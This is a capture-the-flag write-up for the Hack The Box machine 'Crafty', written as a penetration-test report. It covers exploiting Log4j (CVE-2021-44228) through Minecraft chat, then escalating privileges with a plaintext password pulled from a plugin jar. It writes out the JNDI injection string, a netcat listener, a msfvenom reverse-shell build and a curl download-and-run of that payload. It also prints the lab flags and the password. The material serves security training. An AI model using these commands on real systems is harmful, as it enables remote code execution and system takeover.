HTB Crafty
Initial Access
Vulnerability Examplanation: Log4j (CVE-2021-44228)
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Vulnerability Fix:
- Please consider updating the Java runtime environment to a current version.
Severity: CVSS 3.0 - 10.0 Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Steps to reproduce the attack:
Service enumeration
| Port | Protocol | Version | Notes |
|---|---|---|---|
| 80/tcp | http | Microsoft IIS httpd 10.0 | |
| 25565/tcp | Minecraft | Minecraft 1.16.5 |
Service table acquired by the following nmap scan:
sudo nmap -sC -sV -vvv -Pn 10.129.5.88
This yielded the following:
Nmap scan report for 10.129.5.88
Host is up, received user-set (0.060s latency).
Scanned at 2024-02-22 08:41:04 EST for 21s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://crafty.htb
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Initial Access Method
Noting the hostname crafty.htb in the nmap output, this was manually added to /etc/hosts. Subsequently, manual investigation of the web page located at http://crafty.htb/ seemed to indicate by the branding present that this was a Minecraft game server.
Additionally, from observing this page, the subdomain play.crafty.htb was discovered and added to /etc/hosts.
Subsequently, an nmap scan was run to confirm the presence of a Minecraft server on Mincraft's default port TCP 25565:
Noting version 1.16.5, this was searched for on the Minecraft Wiki
Noting that this version dated from early 2021, and knowing that Minecraft is a Java Application, it was suspected that the application may have been vulnerable to Log4j.
To facilitate attacking Minecraft, TLauncher was downloaded in order to provide for a non-authenticated client.
Additionally, this POC server was git clone'd into /home/kali/tools/ in order to facilitate delivery of a log4j payload.
This proved to have dependency errors when run:
Accordingly, jdk1.8.0_202 was downloaded as a dependency for the above from Oracle. In order for this to function with the above, it was also renamed:
mv jdk1.8.0_202 jdk1.8.0_20
The log4j POC server, poc.py was initially configured to attempt to spawn a Linux shell:
This was modified to target cmd.exe, as the target is a Windows host:
After this, the POC server was launched:
sudo ./poc.py --userip 10.10.14.95 --webport 8000 --lport 9001
Additionally, a netcat listener was setup to receive the reverse shell after exploitation:
nc -lvnp 9001
With the infrastructure built, T-Launcher was started and a multiplayer connection to play.crafty.htb was initiated using the unauthenticated username Hackerman. The server permitted logon, likely being configured in offline mode.
Once logged in, the payload ${jndi:ldap://10.10.14.95:1389/a} was injected through the in-game chat system (accessed by pressing t).
This resulted in a reverse shell being caught by the previously established netcat listener:
Local.txt Value:
6f9a5c386f5b1095815506f580d62d54
Pivilege Escalation
Vulnerability Examplanation: Plaintext credentials in binary
Plaintext credentials are used in a connection function within an Java Jar file. This Jar can be opened in a devleopment kit to extract the credentials.
Vulnerability Fix:
- Please consider finding an alternative plugin that follows secure coding principles.
- If this plugin must be used, please consider moving the credential into an encrypted external configuration file, and use filesystem permissions in order to ensure that the decryption key is only available to the service account running the plugin. The credential can be programmatically imported at run time from this external file.
Severity: MEDIUM
Steps to reproduce the attack:
Upon ganing initial access, a Meterpreter payload was created with the intention of upgrading the current shell:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.95 LPORT=4444 -f exe > shell.exe
This was served from a Python server:
python3 -m http.server 80
On the compromised host, this shell was downloaded and run as follows:
PS C:\users\svc_minecraft> cmd /c "curl -X GET http://10.10.14.95/shell.exe -O"
MSFConsole was started and a multi/handler was configured:
The payload shell.exe was then executed on the remote host:
PS C:\Users\svc_minecraft> .\shell.exe
Using this shell, C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar was discovered. This was then downloaded using Meterpreter's internal download command.
One exfiltrated, this file was examined:
jd-gui playercounter-1.0-SNAPSHOT.jar
Inspecting the code, we can see that the connect() function takes a password as an argument.
This function was discovered to be in used in the RCON section, which revealed the plaintext password s67u84zKq8IXw
The Meterpreter session was backgrounded using bg, and then /windows/local/run_as was configured as follows using the found credential:
Once this was run, an administrative shell was achieved.
Post Exploitation
Proof.txt Value:
f8a69304ba0b72df52a78f1b4563a13b